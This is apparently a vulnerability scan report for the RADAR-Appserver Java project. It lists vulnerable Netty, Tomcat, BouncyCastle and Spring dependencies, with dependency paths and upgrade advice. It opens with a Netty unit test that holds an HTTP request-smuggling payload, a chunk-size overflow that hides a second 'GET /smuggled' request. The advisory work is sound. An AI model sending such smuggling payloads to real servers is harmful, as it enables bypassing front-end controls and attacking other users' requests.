"Host: localhost\r\n" +
"Transfer-Encoding: chunked\r\n\r\n" +
"100000004\r\n" +
"test\r\n" +
"0\r\n" +
"\r\n" +
"GET /smuggled HTTP/1.1\r\n" +
"Host: localhost\r\n" +
"Content-Length: 0\r\n" +
"\r\n";
EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));
// Request 1
HttpRequest request = channel.readInbound();
assertTrue(request.decoderResult().isSuccess());
HttpContent content = channel.readInbound();
assertTrue(content.decoderResult().isSuccess());
assertEquals("test", content.content().toString(CharsetUtil.US_ASCII));
content.release();
LastHttpContent last = channel.readInbound();
assertTrue(last.decoderResult().isSuccess());
last.release();
// Request 2
request = channel.readInbound();
assertTrue(request.decoderResult().isSuccess());
last = channel.readInbound();
assertTrue(last.decoderResult().isSuccess());
last.release();
}
Remediation
Upgrade io.netty:netty-codec-http to version 4.1.133.Final, 4.2.13.Final or higher.
References
medium severity
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.53.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to Improper Certificate Validation in getSSLHostConfig(), which does not sufficiently account for all protocol host name inputs. An attacker can access sensitive information in some cases.
Note: This is a partial bypass for the vulnerability described in CVE-2025-66614.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.116, 10.1.53, 11.0.20 or higher.
References
medium severity
new
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.55.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to Improper Validation of Syntactic Correctness of Input in the processing of HTTP/2 request headers. An attacker can cause unexpected behavior or potentially compromise the application by sending specially crafted HTTP/2 request headers.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.118, 10.1.55, 11.0.22 or higher.
References
medium severity
new
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-websocket
- Introduced through: org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21
Overview
Affected versions of this package are vulnerable to Exposure of Private Personal Information to an Unauthorized Actor in WebSocket client during authentication. An attacker can obtain sensitive HTTP authentication headers by initiating a WebSocket handshake with a malicious host.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-websocket to version 8.0.1, 9.0.0.M1, 9.0.118, 10.1.55, 11.0.22 or higher.
References
medium severity
- Vulnerable module: org.bouncycastle:bcprov-jdk18on
- Introduced through: io.minio:minio@8.6.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › io.minio:minio@8.6.0 › org.bouncycastle:bcprov-jdk18on@1.81Remediation: Upgrade to io.minio:minio@9.0.1.
Overview
Affected versions of this package are vulnerable to LDAP Injection via the parseDN handling and the LDAP store helpers in X509LDAPCertStoreSpi and LDAPStoreHelper. An attacker can influence LDAP search filters by supplying a crafted X.500 subject or issuer string that is parsed into an unescaped filter value. This lets the attacker alter the directory query used to locate certificates and CRLs, causing the application to retrieve incorrect LDAP entries or fail to find the intended ones, which can break certificate validation and revocation checks.
Remediation
Upgrade org.bouncycastle:bcprov-jdk18on to version 1.84 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-core
- Introduced through: org.springframework:spring-aop@6.2.10, org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springframework:spring-aop@6.2.18.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springframework:spring-aop@6.2.18.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
